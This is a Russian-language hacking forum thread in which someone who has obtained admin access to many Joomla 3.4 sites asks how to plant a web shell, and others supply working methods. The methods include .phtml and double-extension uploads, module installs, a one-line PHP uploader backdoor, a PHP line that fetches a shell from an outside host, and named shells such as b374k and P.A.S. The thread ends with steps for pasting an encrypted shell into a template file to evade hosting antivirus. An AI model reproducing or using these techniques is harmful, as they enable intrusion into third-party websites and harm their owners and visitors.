Намутил доступов в админку на кучу сайтов на Joomla 3.4, не могу залить шел, пробовал через картинки добавлять допустимое расширение php, снимать какие-то ограничения, вообще не пускает. Через шаблон менял код в файлах, сам код меняется, но по ссылке пустая страничка, шела нет. Как сейчас проще всего через админку залить шел? Читал, что джумла 3.4 теперь проверяет файлы, которые заливают через админку и определяет код шела и блочит его, хотя через картинки я даже пустой PHP не мог залить....плиз хелп) Вот с админки инфа по системе; Платформа, на которой работает PHP Linux srv159-h-st.jino.ru 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 Версия базы данных 5.5.41-37.0-log Кодировка базы данных utf8_general_ci Версия PHP 5.5.16 Веб-сервер Apache Интерфейс между веб-сервером и PHP apache2handler Версия Joomla! Joomla! 3.4.0 Stable [ Ember ] 24-February-2015 23:00 GMT Версия Joomla! Platform Joomla Platform 13.1.0 Stable [ Curiosity ] 24-Apr-2013 00:00 GMT
А через шаблон как именно вы заливаитесь? через бегдор или уплодером? уверены ли вы, что вставив свой код, не нарушили структуру кода? при заливке попробуйте менять расширения шелла например на phtml, бывает в корне htaccess пропускает только индексный php, так же можно попробовать через установку модулей, а потом смотреть свой шелл в tmp, так же в зависимости от установленных компонентов из админки можно реализовать локальный инклуд
Можно также попробовать заливать файлы с двойным разрешенным расширением, который не знает апач. например: shell.php.vcf. В большинстве случаев будет прекрасно работать как php.
Через аплоуд или изменяю код файла, когда-то работало, может и нарушаю... Сейчас попробую через модуль
Через модуль тоже борода, устанавливает без файла шела...или это хостинг такой (Ukraine.com.ua) или Джумла. Я читал, что джумла просто палит код шела и удаляет его автоматом...у меня обычный WCO, возможно в этом проблема? Если у кого другие шелы? Вообще кто-то ломал джумлу 3.4, а то тупо получается админки есть, а шел залить не могу...
потому, что там стоит антивирус, очевидно, который проверяет это дело на уровне хостинга. Не думаю, что паблик шеллы будут работать. Пробуйте простенькие бекдоры, только с php-консолькой, вам же больше ничего не нужно, в принципе.
да ты не пихай туда шелл запихай оболочку простую типа PHP: if(isset($_FILE['__z'])) copy($_FILE['__z']['tmp_name'], 'z.php'); а потом через неё зальешь шелл
Если PHP вообще заливается, то попробуй как-то так, что бы сервак сам затянул шелл. PHP: <?php copy('site.ru/shell.txt','shell.php');exit; ?> А вообще, если всо и пас шеллы палятся попробуй b374k очень часто меня выручал, когда все остальные не работали или не проливались.
УРАААА, спасибо огромное, наконец-то, оказывается все просто. 1. Отключаем антивирус у себя на компе (у меня дурака был включен, он тоже блочил много чего) 2. http://profexer.name/pas/download.php - берем тут P.A.S шелл, при этом ставим свой пароль + он криптуется. 3. Тупо заливаем в шаблоны - выбираем шаблон и любой файл php, все работает просто чудесно и не палится. Столько времени потратил, но разобрался. При этом WCO почему то банится и другие шеллы, которые пробовал. Тема закрыта, всем спасибо)